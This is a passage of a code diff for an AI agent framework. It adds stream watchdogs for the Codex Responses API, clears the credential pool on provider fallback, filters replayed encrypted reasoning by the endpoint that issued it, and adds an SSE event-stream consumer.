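VAR = "HERMES_CODEX_TTFB_TIMEOUT_SECONDS"

os.environ[VAR] = "not-a-number"
bad = _env_float(VAR, 12.0)      # unparsable value falls back to the default

os.environ[VAR] = "30"
good = _env_float(VAR, 12.0)     # parsable value wins over the default

os.environ.pop(VAR, None)
missing = _env_float(VAR, 12.0)  # unset variable uses the default
```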
def interruptible_api_call(agent, api_kwargs: dict):
"""
@@ -256,32 +274,89 @@ def interruptible_api_call(agent, api_kwargs: dict):
# apply richer recovery (credential rotation, provider fallback).
_stale_timeout = agent._compute_non_stream_stale_timeout(api_kwargs)
# ── Time-to-first-byte (TTFB) watchdog for the Codex Responses stream ──
# ── Codex Responses stream watchdogs ────────────────────────────────
# The chatgpt.com/backend-api/codex endpoint has an intermittent failure
# mode where it accepts the connection but never emits a single stream
# event (observed directly: 0 events, no HTTP status, the socket just
# hangs). A fresh reconnect succeeds in ~2s, but the wall-clock stale
# timeout (often 180-900s) makes us wait minutes before retrying. While no
# stream event has arrived yet we apply a much shorter TTFB cutoff so the
# main retry loop can reconnect promptly. Once the first event arrives the
# stream is healthy, so we fall back to the wall-clock stale timeout and
# never interrupt a legitimate long generation. Gated to codex_responses:
# only that path streams events incrementally (the chat_completions
# non-stream, anthropic and bedrock branches here have no first-event
# signal). The marker advances on *any* event (see codex_runtime), so
# reasoning-only / tool-call-only turns are not mistaken for a stall.
# Operators can tune via HERMES_CODEX_TTFB_TIMEOUT_SECONDS (0 disables).
_ttfb_enabled = agent.api_mode == "codex_responses"
try:
_ttfb_timeout = float(os.getenv("HERMES_CODEX_TTFB_TIMEOUT_SECONDS", "45"))
except (TypeError, ValueError):
_ttfb_timeout = 45.0
# main retry loop can reconnect promptly. Large subscription-backed Codex
# requests can legitimately spend tens of seconds in backend admission /
# prompt prefill before the first SSE event, so the no-byte TTFB watchdog
# is disabled for large chatgpt.com/backend-api/codex requests. A second
# failure mode emits an opening SSE frame and then stalls forever in SSL
# read; for that we watch the gap since the last Codex stream event. This
# matches Codex CLI's stream_idle_timeout model: any valid SSE event is
# activity. Operators can tune via HERMES_CODEX_TTFB_TIMEOUT_SECONDS and
# HERMES_CODEX_EVENT_STALE_TIMEOUT_SECONDS (0 disables each).
_codex_watchdog_enabled = agent.api_mode == "codex_responses"
_openai_codex_backend = _is_openai_codex_backend(agent)
_est_tokens_for_codex_watchdog = estimate_request_context_tokens(api_kwargs)
if _codex_watchdog_enabled and _openai_codex_backend:
if _est_tokens_for_codex_watchdog > 100_000:
_stale_timeout = max(_stale_timeout, 1200.0)
elif _est_tokens_for_codex_watchdog > 50_000:
_stale_timeout = max(_stale_timeout, 900.0)
elif _est_tokens_for_codex_watchdog > 25_000:
_stale_timeout = max(_stale_timeout, 600.0)
if _est_tokens_for_codex_watchdog > 100_000:
_codex_idle_timeout_default = 180.0
elif _est_tokens_for_codex_watchdog > 50_000:
_codex_idle_timeout_default = 120.0
elif _est_tokens_for_codex_watchdog > 10_000:
_codex_idle_timeout_default = 60.0
else:
_codex_idle_timeout_default = 12.0
_ttfb_enabled = _codex_watchdog_enabled
_ttfb_timeout = _env_float("HERMES_CODEX_TTFB_TIMEOUT_SECONDS", 12.0)
if _ttfb_timeout <= 0:
_ttfb_enabled = False
if _ttfb_enabled:
elif _openai_codex_backend:
_ttfb_disable_above = _env_float("HERMES_CODEX_TTFB_DISABLE_ABOVE_TOKENS", 25_000.0)
_ttfb_strict = os.environ.get("HERMES_CODEX_TTFB_STRICT", "").strip().lower() in {
"1", "true", "yes", "on"
}
if (
not _ttfb_strict
and _ttfb_disable_above > 0
and _est_tokens_for_codex_watchdog >= _ttfb_disable_above
):
_ttfb_enabled = False
logger.info(
"Disabling openai-codex no-byte TTFB watchdog for large request "
"(context=~%s tokens >= %.0f). Waiting for backend response instead. "
"Set HERMES_CODEX_TTFB_STRICT=1 to force early reconnects.",
f"{_est_tokens_for_codex_watchdog:,}",
_ttfb_disable_above,
)
else:
_ttfb_cap = _env_float("HERMES_CODEX_TTFB_MAX_SECONDS", 20.0)
if _ttfb_cap > 0 and _ttfb_timeout > _ttfb_cap:
logger.info(
"Capping openai-codex no-byte TTFB timeout from %.0fs to %.0fs "
"(context=~%s tokens). Set HERMES_CODEX_TTFB_MAX_SECONDS to tune.",
_ttfb_timeout,
_ttfb_cap,
f"{_est_tokens_for_codex_watchdog:,}",
)
_ttfb_timeout = _ttfb_cap
_codex_idle_enabled = _codex_watchdog_enabled
_codex_idle_timeout = _env_float(
"HERMES_CODEX_EVENT_STALE_TIMEOUT_SECONDS",
_codex_idle_timeout_default,
)
if _codex_idle_timeout <= 0:
_codex_idle_enabled = False
if _codex_watchdog_enabled:
# Reset before the worker starts so a marker left over from a previous
# call on this agent can't be misread as first-byte for this one.
agent._codex_stream_last_event_ts = None
agent._codex_stream_last_progress_ts = None
_call_start = time.time()
agent._touch_activity("waiting for non-streaming API response")
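The tiering above can be restated as two pure functions. This is a sketch under assumptions: indentation is lost in this view, so the idle-timeout tiers are assumed to apply to every Codex Responses call while the stale-timeout floors apply only to the chatgpt.com backend. `codex_watchdog_defaults` and `resolve_ttfb` are hypothetical names, and the watchdog is assumed to be enabled.

```python
from typing import Tuple


def codex_watchdog_defaults(
    est_tokens: int, stale_timeout: float, is_openai_codex_backend: bool
) -> Tuple[float, float]:
    """Return (stale_timeout, idle_timeout_default) for a request size."""
    if is_openai_codex_backend:
        if est_tokens > 100_000:
            stale_timeout = max(stale_timeout, 1200.0)
        elif est_tokens > 50_000:
            stale_timeout = max(stale_timeout, 900.0)
        elif est_tokens > 25_000:
            stale_timeout = max(stale_timeout, 600.0)
    if est_tokens > 100_000:
        idle = 180.0
    elif est_tokens > 50_000:
        idle = 120.0
    elif est_tokens > 10_000:
        idle = 60.0
    else:
        idle = 12.0
    return stale_timeout, idle


def resolve_ttfb(
    timeout: float,
    est_tokens: int,
    is_openai_codex_backend: bool,
    *,
    strict: bool = False,
    disable_above: float = 25_000.0,
    cap: float = 20.0,
) -> Tuple[bool, float]:
    """Return (ttfb_enabled, ttfb_timeout) following the branch order above."""
    if timeout <= 0:
        return False, timeout
    if not is_openai_codex_backend:
        return True, timeout
    if not strict and disable_above > 0 and est_tokens >= disable_above:
        return False, timeout  # large request: wait for the backend instead
    if cap > 0 and timeout > cap:
        timeout = cap
    return True, timeout


large = codex_watchdog_defaults(120_000, 300.0, True)
small = codex_watchdog_defaults(5_000, 300.0, False)
ttfb_large = resolve_ttfb(12.0, 30_000, True)
ttfb_capped = resolve_ttfb(45.0, 1_000, True)
```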
@@ -313,6 +388,13 @@ def interruptible_api_call(agent, api_kwargs: dict):
and _elapsed > _ttfb_timeout
and getattr(agent, "_codex_stream_last_event_ts", None) is None
):
_silent_hint: Optional[str] = None
_hint_fn = getattr(agent, "_codex_silent_hang_hint", None)
if callable(_hint_fn):
try:
_silent_hint = _hint_fn(model=api_kwargs.get("model"))
except Exception:
_silent_hint = None
logger.warning(
"Codex stream produced no bytes within TTFB cutoff "
"(%.0fs > %.0fs, model=%s). Backend accepted the connection "
@@ -320,11 +402,18 @@ def interruptible_api_call(agent, api_kwargs: dict):
"loop can reconnect.",
_elapsed, _ttfb_timeout, api_kwargs.get("model", "unknown"),
)
agent._emit_status(
f"⚠️ No first byte from provider in {int(_elapsed)}s "
f"(codex stream, model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting."
)
if _silent_hint:
agent._buffer_status(
f"⚠️ No first byte from provider in {int(_elapsed)}s "
f"(codex stream, model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting. {_silent_hint}"
)
else:
agent._buffer_status(
f"⚠️ No first byte from provider in {int(_elapsed)}s "
f"(codex stream, model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting."
)
try:
_close_request_client_once("codex_ttfb_kill")
except Exception:
@@ -334,10 +423,55 @@ def interruptible_api_call(agent, api_kwargs: dict):
)
# Wait briefly for the worker to notice the closed connection.
t.join(timeout=2.0)
if result["error"] is None and result["response"] is None:
if _silent_hint:
result["error"] = TimeoutError(
f"Codex stream produced no bytes within {int(_elapsed)}s "
f"(TTFB threshold: {int(_ttfb_timeout)}s). {_silent_hint}"
)
else:
result["error"] = TimeoutError(
f"Codex stream produced no bytes within {int(_elapsed)}s "
f"(TTFB threshold: {int(_ttfb_timeout)}s)"
)
break
# Stream-idle detector: the Codex backend emitted at least one SSE
# frame, then stopped emitting events. Valid keepalive / in_progress
# frames refresh _codex_stream_last_event_ts and should not be killed.
_last_codex_event_ts = getattr(agent, "_codex_stream_last_event_ts", None)
if (
_codex_idle_enabled
and _last_codex_event_ts is not None
and (time.time() - _last_codex_event_ts) > _codex_idle_timeout
):
_event_stale_elapsed = time.time() - _last_codex_event_ts
logger.warning(
"Codex stream produced no SSE events for %.0fs after first byte "
"(threshold %.0fs, model=%s, context=~%s tokens). Killing "
"connection so the retry loop can reconnect.",
_event_stale_elapsed,
_codex_idle_timeout,
api_kwargs.get("model", "unknown"),
f"{_est_tokens_for_codex_watchdog:,}",
)
agent._buffer_status(
f"⚠️ Codex stream sent no events for {int(_event_stale_elapsed)}s "
f"after first byte (model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting."
)
try:
_close_request_client_once("codex_stream_idle_kill")
except Exception:
pass
agent._touch_activity(
f"codex stream killed after {int(_event_stale_elapsed)}s with no SSE events"
)
t.join(timeout=2.0)
if result["error"] is None and result["response"] is None:
result["error"] = TimeoutError(
f"Codex stream produced no bytes within {int(_elapsed)}s "
f"(TTFB threshold: {int(_ttfb_timeout)}s)"
f"Codex stream produced no SSE events for {int(_event_stale_elapsed)}s "
f"after first byte (threshold: {int(_codex_idle_timeout)}s)"
)
break
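The two watchdog conditions differ only in what the last-event marker looks like, which a pair of predicates makes explicit. `ttfb_expired` and `stream_idle` are hypothetical names; the real loop evaluates these conditions inline against `agent._codex_stream_last_event_ts`.

```python
from typing import Optional


def ttfb_expired(
    elapsed: float, ttfb_timeout: float, last_event_ts: Optional[float],
    enabled: bool = True,
) -> bool:
    """No event has arrived at all and the first-byte budget is spent."""
    return bool(enabled and elapsed > ttfb_timeout and last_event_ts is None)


def stream_idle(
    now: float, last_event_ts: Optional[float], idle_timeout: float,
    enabled: bool = True,
) -> bool:
    """At least one event arrived, then nothing for longer than the budget."""
    return bool(
        enabled
        and last_event_ts is not None
        and (now - last_event_ts) > idle_timeout
    )


never_started = ttfb_expired(elapsed=15.0, ttfb_timeout=12.0, last_event_ts=None)
stalled_midway = stream_idle(now=100.0, last_event_ts=30.0, idle_timeout=60.0)
still_flowing = stream_idle(now=100.0, last_event_ts=95.0, idle_timeout=60.0)
```

Any valid event, including keepalives, moves the marker forward, so a slow but live stream never trips the idle check.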
@@ -359,13 +493,13 @@ def interruptible_api_call(agent, api_kwargs: dict):
api_kwargs.get("model", "unknown"), f"{_est_ctx:,}",
)
if _silent_hint:
agent._emit_status(
agent._buffer_status(
f"⚠️ No response from provider for {int(_elapsed)}s "
f"(non-streaming, model: {api_kwargs.get('model', 'unknown')}). "
f"{_silent_hint}"
)
else:
agent._emit_status(
agent._buffer_status(
f"⚠️ No response from provider for {int(_elapsed)}s "
f"(non-streaming, model: {api_kwargs.get('model', 'unknown')}). "
f"Aborting call."
@@ -507,6 +641,9 @@ def build_api_kwargs(agent, api_messages: list) -> dict:
is_codex_backend=is_codex_backend,
is_xai_responses=is_xai_responses,
github_reasoning_extra=agent._github_models_reasoning_extra_body() if is_github_responses else None,
replay_encrypted_reasoning=bool(
getattr(agent, "_codex_reasoning_replay_enabled", True)
),
)
# ── chat_completions (default) ─────────────────────────────────────
@@ -1019,6 +1156,25 @@ def try_activate_fallback(agent, reason: "FailoverReason | None" = None) -> bool
agent._transport_cache.clear()
agent._fallback_activated = True
# Clear the credential pool when the fallback provider doesn't match
# the pool's provider. The pool was seeded for the primary provider;
# leaving it attached means downstream recovery (rate_limit / billing /
# auth) calls ``_swap_credential`` with a primary entry which overwrites
# the agent's ``base_url`` back to the primary's endpoint — every
# fallback request then 404s against the wrong host. See #33163.
# When the fallback shares the pool's provider (e.g. both openrouter
# entries with different routing) the pool is preserved.
_existing_pool = getattr(agent, "_credential_pool", None)
if _existing_pool is not None:
_pool_provider = (getattr(_existing_pool, "provider", "") or "").strip().lower()
if _pool_provider and _pool_provider != fb_provider:
logger.info(
"Fallback to %s/%s: clearing primary credential pool "
"(pool_provider=%s) to prevent cross-provider contamination",
fb_provider, fb_model, _pool_provider,
)
agent._credential_pool = None
# Honor per-provider / per-model request_timeout_seconds for the
# fallback target (same knob the primary client uses). None = use
# SDK default.
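The pool-clearing rule reduces to a small predicate. `should_clear_pool` is a hypothetical helper, and the pool is modelled as any object with a `provider` attribute, which is an assumption about the real credential pool type.

```python
from types import SimpleNamespace
from typing import Any, Optional


def should_clear_pool(pool: Optional[Any], fb_provider: str) -> bool:
    """True when the pool belongs to a different provider than the fallback."""
    if pool is None:
        return False
    pool_provider = (getattr(pool, "provider", "") or "").strip().lower()
    return bool(pool_provider) and pool_provider != fb_provider


cross_provider = should_clear_pool(SimpleNamespace(provider="OpenRouter "), "anthropic")
same_provider = should_clear_pool(SimpleNamespace(provider="openrouter"), "openrouter")
unlabelled = should_clear_pool(SimpleNamespace(provider=None), "anthropic")
```

A pool with no provider label is left attached, matching the guard on a non-empty `_pool_provider` in the hunk.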
@@ -1106,7 +1262,7 @@ def try_activate_fallback(agent, reason: "FailoverReason | None" = None) -> bool
api_mode=agent.api_mode,
)
agent._emit_status(
agent._buffer_status(
f"🔄 Primary model failed — switching to fallback: "
f"{fb_model} via {fb_provider}"
)
@@ -2095,7 +2251,7 @@ def interruptible_streaming_api_call(agent, api_kwargs: dict, *, on_first_delta=
mid_tool_call=False,
diag=request_client_holder.get("diag"),
)
agent._emit_status(
agent._buffer_status(
"❌ Provider returned malformed streaming data after "
f"{_max_stream_retries + 1} attempts. "
"The provider may be experiencing issues — "
@@ -2202,7 +2358,7 @@ def interruptible_streaming_api_call(agent, api_kwargs: dict, *, on_first_delta=
_stale_elapsed, _stream_stale_timeout,
api_kwargs.get("model", "unknown"), f"{_est_ctx:,}",
)
agent._emit_status(
agent._buffer_status(
f"⚠️ No response from provider for {int(_stale_elapsed)}s "
f"(model: {api_kwargs.get('model', 'unknown')}, "
f"context: ~{_est_ctx:,} tokens). "
+143 -11
@@ -23,6 +23,38 @@ from agent.prompt_builder import DEFAULT_AGENT_IDENTITY
logger = logging.getLogger(__name__)
def _classify_responses_issuer(
*,
is_xai_responses: bool = False,
is_github_responses: bool = False,
is_codex_backend: bool = False,
base_url: Optional[str] = None,
) -> str:
"""Stable identifier for the Responses endpoint that mints encrypted_content.
``reasoning.encrypted_content`` is sealed to the endpoint that issued it:
replaying a Codex-minted blob against xAI (or vice versa) deterministically
returns HTTP 400 ``invalid_encrypted_content``. Stamping the issuer on
persisted reasoning items and filtering at replay time lets a single
conversation switch models without poisoning history with un-decryptable
reasoning blocks.
"""
if is_xai_responses:
return "xai_responses"
if is_github_responses:
return "github_responses"
if is_codex_backend:
return "codex_backend"
if base_url:
return f"other:{base_url}"
return "other"
# Throttle the per-process cross-issuer skip warning so we don't flood logs
# when a long history contains many stale-issuer reasoning blocks.
_CROSS_ISSUER_WARN_EMITTED = False
# Matches Codex/Harmony tool-call serialization that occasionally leaks into
# assistant-message content when the model fails to emit a structured
# ``function_call`` item. Accepts the common forms:
@@ -248,6 +280,8 @@ def _chat_messages_to_responses_input(
messages: List[Dict[str, Any]],
*,
is_xai_responses: bool = False,
replay_encrypted_reasoning: bool = True,
current_issuer_kind: Optional[str] = None,
) -> List[Dict[str, Any]]:
"""Convert internal chat-style messages to Responses input items.
@@ -261,6 +295,27 @@ def _chat_messages_to_responses_input(
integration). We now replay encrypted reasoning on every Responses
transport (xAI, native Codex, custom relays) and let xAI tell us
explicitly if a specific surface ever rejects a payload.
``replay_encrypted_reasoning`` is the per-session kill switch. Some
OpenAI-compatible relays accept the request but later reject the
replayed encrypted blob with HTTP 400 ``invalid_encrypted_content``;
when that happens the retry loop calls
``AIAgent._disable_codex_reasoning_replay`` which both strips cached
items from the conversation history and threads ``replay_encrypted_reasoning=False``
through this converter so subsequent turns send no reasoning items.
``current_issuer_kind`` enables a per-item cross-issuer guard. The
Responses API's ``encrypted_content`` blob is decryptable only by the
endpoint that minted it; replaying a Codex-issued blob against xAI
(or vice versa) always yields HTTP 400 ``invalid_encrypted_content``
and breaks every subsequent turn in the same session. When this
argument is provided and a reasoning item carries an ``_issuer_kind``
stamp from a different endpoint, the item is dropped from the replayed
input. Legacy items without a stamp are still replayed
(backwards-compatible). The two guards compose:
``replay_encrypted_reasoning=False`` is the session-wide kill switch
(drops ALL replay); ``current_issuer_kind`` is the per-item filter
that runs only when replay is still enabled.
"""
items: List[Dict[str, Any]] = []
seen_item_ids: set = set()
@@ -290,7 +345,11 @@ def _chat_messages_to_responses_input(
# This applies to every Responses transport including
# xAI — see _chat_messages_to_responses_input docstring
# for the May 2026 reversal of the earlier xAI gate.
codex_reasoning = msg.get("codex_reasoning_items")
codex_reasoning = (
msg.get("codex_reasoning_items")
if replay_encrypted_reasoning
else None
)
has_codex_reasoning = False
if isinstance(codex_reasoning, list):
for ri in codex_reasoning:
@@ -298,11 +357,40 @@ def _chat_messages_to_responses_input(
item_id = ri.get("id")
if item_id and item_id in seen_item_ids:
continue
# Cross-issuer guard: drop reasoning blocks that
# were minted by a different Responses endpoint.
# The current endpoint cannot decrypt foreign
# encrypted_content and would reject the whole
# request with HTTP 400 invalid_encrypted_content.
# Unstamped (legacy) items pass through.
item_issuer = ri.get("_issuer_kind")
if (
current_issuer_kind is not None
and item_issuer is not None
and item_issuer != current_issuer_kind
):
global _CROSS_ISSUER_WARN_EMITTED
if not _CROSS_ISSUER_WARN_EMITTED:
logger.warning(
"Dropping reasoning item minted by %s while "
"calling %s — encrypted_content is sealed to "
"its issuer. This happens when a session "
"switches model providers mid-conversation.",
item_issuer, current_issuer_kind,
)
_CROSS_ISSUER_WARN_EMITTED = True
continue
# Strip the "id" field — with store=False the
# Responses API cannot look up items by ID and
# returns 404. The encrypted_content blob is
# self-contained for reasoning chain continuity.
replay_item = {k: v for k, v in ri.items() if k != "id"}
# Also strip the internal "_issuer_kind" stamp;
# it is a Hermes-side metadata key and not part
# of the Responses API schema.
replay_item = {
k: v for k, v in ri.items()
if k not in ("id", "_issuer_kind")
}
items.append(replay_item)
if item_id:
seen_item_ids.add(item_id)
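How the kill switch and the cross-issuer guard compose can be seen in a simplified filter. `replayable_reasoning_items` is a hypothetical function; the real converter applies further checks that fall outside this hunk, and the sample items are invented.

```python
from typing import Any, Dict, List, Optional


def replayable_reasoning_items(
    items: List[Dict[str, Any]],
    current_issuer_kind: Optional[str],
    replay_encrypted_reasoning: bool = True,
) -> List[Dict[str, Any]]:
    """Drop foreign-issuer and duplicate items, then strip internal keys."""
    if not replay_encrypted_reasoning:
        return []  # session-wide kill switch wins over everything else
    out: List[Dict[str, Any]] = []
    seen_ids: set = set()
    for ri in items:
        item_id = ri.get("id")
        if item_id and item_id in seen_ids:
            continue
        issuer = ri.get("_issuer_kind")
        if (
            current_issuer_kind is not None
            and issuer is not None
            and issuer != current_issuer_kind
        ):
            continue  # sealed to another endpoint; replay would be rejected
        out.append({k: v for k, v in ri.items() if k not in ("id", "_issuer_kind")})
        if item_id:
            seen_ids.add(item_id)
    return out


history = [
    {"id": "a", "type": "reasoning", "encrypted_content": "x", "_issuer_kind": "codex_backend"},
    {"id": "b", "type": "reasoning", "encrypted_content": "y", "_issuer_kind": "xai_responses"},
    {"id": "c", "type": "reasoning", "encrypted_content": "z"},  # legacy, unstamped
    {"id": "a", "type": "reasoning", "encrypted_content": "x", "_issuer_kind": "codex_backend"},
]
for_codex = replayable_reasoning_items(history, "codex_backend")
```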
@@ -825,6 +913,26 @@ def _preflight_codex_api_kwargs(
elif "stream" in api_kwargs:
raise ValueError("Codex Responses stream flag is only allowed in fallback streaming requests.")
# Safety-net sanitization for xAI Responses (#28490): defense-in-depth
# for the same slash-enum strip that ``chat_completion_helpers`` and
# ``auxiliary_client`` apply at request-build time. If a future code
# path forgets to sanitize before calling us, this catches the bypass
# so xAI doesn't 400 with ``Invalid arguments passed to the model``
# (HuggingFace IDs like ``Qwen/Qwen3.5-0.8B`` from MCP tool schemas).
#
# Gated on the model name pattern because native Codex (OpenAI) DOES
# accept slash-containing enum values — stripping them there would
# silently degrade tool-schema constraints. xAI is the only
# Responses-API surface that rejects the shape.
model_name_for_provider_check = str(api_kwargs.get("model") or "").lower()
is_xai_model = model_name_for_provider_check.startswith(("grok-", "x-ai/grok-"))
if is_xai_model and normalized.get("tools"):
try:
from tools.schema_sanitizer import strip_slash_enum
normalized["tools"], _ = strip_slash_enum(normalized["tools"])
except Exception:
pass # Best-effort — the caller-level sanitization should have handled it
unexpected = sorted(key for key in api_kwargs if key not in allowed_keys)
if unexpected:
raise ValueError(
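The provider gate used for the safety-net sanitization can be checked on its own. The sketch below only reproduces the model-name test from the hunk; the function name `is_xai_model` is an assumption (the diff uses a local variable of that name), and the sanitizer itself is not reproduced because its behavior is not shown here.

```python
from typing import Any


def is_xai_model(model: Any) -> bool:
    """Return True when the model name looks like an xAI Grok model.

    Same prefix test as the hunk above: case-insensitive, tolerant of None.
    """
    name = str(model or "").lower()
    return name.startswith(("grok-", "x-ai/grok-"))


checks = {
    "Grok-4": is_xai_model("Grok-4"),
    "x-ai/grok-4": is_xai_model("x-ai/grok-4"),
    "gpt-5.5": is_xai_model("gpt-5.5"),
    "none": is_xai_model(None),
}
```

Gating on the name prefix keeps the strip away from native Codex requests, where slash-containing enum values are accepted.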
@@ -876,8 +984,18 @@ def _extract_responses_reasoning_text(item: Any) -> str:
# Full response normalization
# ---------------------------------------------------------------------------
def _normalize_codex_response(response: Any) -> tuple[Any, str]:
"""Normalize a Responses API object to an assistant_message-like object."""
def _normalize_codex_response(
response: Any,
*,
issuer_kind: Optional[str] = None,
) -> tuple[Any, str]:
"""Normalize a Responses API object to an assistant_message-like object.
``issuer_kind`` (when provided) is stamped onto each reasoning item the
response yields, so future replays can detect when the active endpoint
differs from the one that minted the encrypted_content blob and drop
the item instead of triggering HTTP 400 invalid_encrypted_content.
"""
output = getattr(response, "output", None)
if not isinstance(output, list) or not output:
# The Codex backend can return empty output when the answer was
@@ -919,6 +1037,7 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
has_incomplete_items = response_status in {"queued", "in_progress", "incomplete"}
saw_commentary_phase = False
saw_final_answer_phase = False
saw_reasoning_item = False
for item in output:
item_type = getattr(item, "type", None)
@@ -956,6 +1075,7 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
raw_message_item["phase"] = normalized_phase
message_items_raw.append(raw_message_item)
elif item_type == "reasoning":
saw_reasoning_item = True
reasoning_text = _extract_responses_reasoning_text(item)
if reasoning_text:
reasoning_parts.append(reasoning_text)
@@ -965,7 +1085,19 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
encrypted = getattr(item, "encrypted_content", None)
if isinstance(encrypted, str) and encrypted:
raw_item = {"type": "reasoning", "encrypted_content": encrypted}
# Stamp the issuer so future turns can detect when a
# model swap moved the conversation to an endpoint that
# cannot decrypt this blob — see _chat_messages_to_responses_input
# cross-issuer guard.
if issuer_kind:
raw_item["_issuer_kind"] = issuer_kind
item_id = getattr(item, "id", None)
if isinstance(item_id, str) and item_id.startswith("rs_tmp_"):
logger.debug(
"Skipping transient Codex reasoning item during normalization: %s",
item_id,
)
continue
if isinstance(item_id, str) and item_id:
raw_item["id"] = item_id
# Capture summary — required by the API when replaying reasoning items
@@ -1076,13 +1208,13 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
finish_reason = "incomplete"
elif has_incomplete_items or (saw_commentary_phase and not saw_final_answer_phase):
finish_reason = "incomplete"
elif reasoning_items_raw and not final_text:
# Response contains only reasoning (encrypted thinking state) with
# no visible content or tool calls. The model is still thinking and
# needs another turn to produce the actual answer. Marking this as
# "stop" would send it into the empty-content retry loop which burns
# 3 retries then fails — treat it as incomplete instead so the Codex
# continuation path handles it correctly.
elif (reasoning_items_raw or reasoning_parts or saw_reasoning_item) and not final_text:
# Response contains only reasoning (encrypted thinking state and/or
# human-readable summary) with no visible content or tool calls. The
# model is still thinking and needs another turn to produce the actual
# answer. Marking this as "stop" would send it into the empty-content
# retry loop which burns retries then fails — treat it as incomplete so
# the Codex continuation path handles it correctly.
finish_reason = "incomplete"
else:
finish_reason = "stop"
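The tail of the finish-reason decision shown above can be sketched as a small pure function. This is an illustration under assumptions: earlier branches of the real chain (not visible in this hunk) are omitted, and the function name and keyword arguments are hypothetical stand-ins for the local variables in the diff.

```python
def pick_finish_reason(
    *,
    has_incomplete_items: bool,
    saw_commentary_phase: bool,
    saw_final_answer_phase: bool,
    saw_reasoning: bool,
    final_text: str,
) -> str:
    """Sketch of the last three branches of the finish_reason chain."""
    if has_incomplete_items or (saw_commentary_phase and not saw_final_answer_phase):
        return "incomplete"
    if saw_reasoning and not final_text:
        # Reasoning-only response: the model needs another turn, so avoid
        # "stop", which would route into the empty-content retry loop.
        return "incomplete"
    return "stop"


reasoning_only = pick_finish_reason(
    has_incomplete_items=False,
    saw_commentary_phase=False,
    saw_final_answer_phase=False,
    saw_reasoning=True,
    final_text="",
)
with_answer = pick_finish_reason(
    has_incomplete_items=False,
    saw_commentary_phase=False,
    saw_final_answer_phase=True,
    saw_reasoning=True,
    final_text="done",
)
```

Here `saw_reasoning` stands for the widened condition in the new code, which is true when any reasoning item was seen, even one with neither encrypted content nor summary text.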
+331 -249
@@ -174,281 +174,363 @@ def run_codex_app_server_turn(
}
# ---------------------------------------------------------------------------
# Event-driven Responses streaming
#
# OpenAI ships its consumer Codex backend (chatgpt.com/backend-api/codex) on
# a different schedule from the openai Python SDK. The high-level
# ``client.responses.stream(...)`` helper reconstructs a typed Response from
# the terminal ``response.completed`` event's ``response.output`` field, and
# when that field drifts to ``null`` (gpt-5.5, May 2026) the SDK raises
# ``TypeError: 'NoneType' object is not iterable`` mid-iteration.
#
# We sidestep the whole class of failure by going one level lower:
# ``client.responses.create(stream=True)`` returns the raw AsyncIterable of
# SSE events, and we assemble the final response object purely from
# ``response.output_item.done`` events as they arrive. We never read
# ``response.completed.response.output`` for content reconstruction, so the
# backend can return ``null``, ``[]``, a string, or omit the field entirely
# and we don't care.
#
# This mirrors what the OpenClaw TS implementation does for the same backend
# and is structurally immune to the bug class rather than patched.
# ---------------------------------------------------------------------------
def run_codex_stream(agent, api_kwargs: dict, client: Any = None, on_first_delta: callable = None):
"""Execute one streaming Responses API request and return the final response."""
_TERMINAL_EVENT_TYPES = frozenset({
"response.completed",
"response.incomplete",
"response.failed",
})
def _event_field(event: Any, name: str, default: Any = None) -> Any:
"""Field access that handles both attr-style (SDK objects) and dict (raw JSON) events."""
value = getattr(event, name, None)
if value is None and isinstance(event, dict):
value = event.get(name, default)
return value if value is not None else default
def _raise_stream_error(event: Any) -> None:
"""Raise a ``_StreamErrorEvent`` from a ``type=error`` SSE frame.
Imported lazily so this module stays importable from places that don't
pull in ``run_agent`` (e.g. plugin code, doc tools).
"""
from run_agent import _StreamErrorEvent
message = (_event_field(event, "message", "") or "stream emitted error event").strip()
raise _StreamErrorEvent(
message,
code=_event_field(event, "code"),
param=_event_field(event, "param"),
)
def _consume_codex_event_stream(
event_iter: Any,
*,
model: str,
on_text_delta=None,
on_reasoning_delta=None,
on_first_delta=None,
on_event=None,
interrupt_check=None,
) -> SimpleNamespace:
"""Consume a Codex Responses SSE event stream and return a final response.
The returned object is a ``SimpleNamespace`` shaped like the SDK's typed
``Response`` for the fields downstream code actually reads:
* ``output``: list of output items, assembled from ``response.output_item.done``.
For tool-call turns this contains the function_call items; for plain-text
turns it contains a synthesized ``message`` item built from streamed deltas
if no message item was emitted directly.
* ``output_text``: assembled text from ``response.output_text.delta`` deltas.
* ``usage``: copied from the terminal event's ``response.usage`` (when present).
* ``status``: ``completed`` / ``incomplete`` / ``failed`` (or ``completed`` if
the stream ended without a terminal frame but produced content).
* ``id``: ``response.id`` when present.
* ``incomplete_details``: passed through for ``response.incomplete`` frames.
* ``error``: passed through for ``response.failed`` frames.
* ``model``: from kwargs (the wire model name is not authoritative).
Critically, we never read ``response.output`` from the terminal event for
content reconstruction, only ``usage``, ``status``, and ``id``. The ``output``
field being ``null`` / ``[]`` / missing is fine.
Callbacks:
* ``on_text_delta(str)`` fires per ``response.output_text.delta``, suppressed
once a function_call event is seen (so tool-call turns don't bleed text
into the chat).
* ``on_reasoning_delta(str)`` fires per ``response.reasoning.*.delta``.
* ``on_first_delta()`` is one-shot and fires on the first text delta only.
* ``on_event(event)`` fires for every event before any other processing.
Used for watchdog activity, debug logging, anything wire-shape-agnostic.
* ``interrupt_check()`` returns True to break the loop early.
"""
collected_output_items: List[Any] = []
collected_text_deltas: List[str] = []
has_tool_calls = False
first_delta_fired = False
terminal_status: str = "completed"
terminal_usage: Any = None
terminal_response_id: str = None
terminal_incomplete_details: Any = None
terminal_error: Any = None
saw_terminal = False
for event in event_iter:
if on_event is not None:
try:
on_event(event)
except (TimeoutError, InterruptedError):
# Control-flow signals from watchdog/cancellation hooks must
# propagate, not get swallowed as "debug noise".
raise
except Exception:
# Genuine bugs in third-party debug/log hooks shouldn't break
# stream consumption.
logger.debug("Codex stream on_event hook raised", exc_info=True)
if interrupt_check is not None and interrupt_check():
break
event_type = _event_field(event, "type", "")
if not isinstance(event_type, str):
event_type = ""
# ``error`` SSE frames carry the provider's real failure reason
# (subscription / quota / model-not-available / rejected-reasoning-replay)
# but never appear in the terminal set. Surface them as a structured
# exception so the credential pool + error classifier see the body.
if event_type == "error":
_raise_stream_error(event)
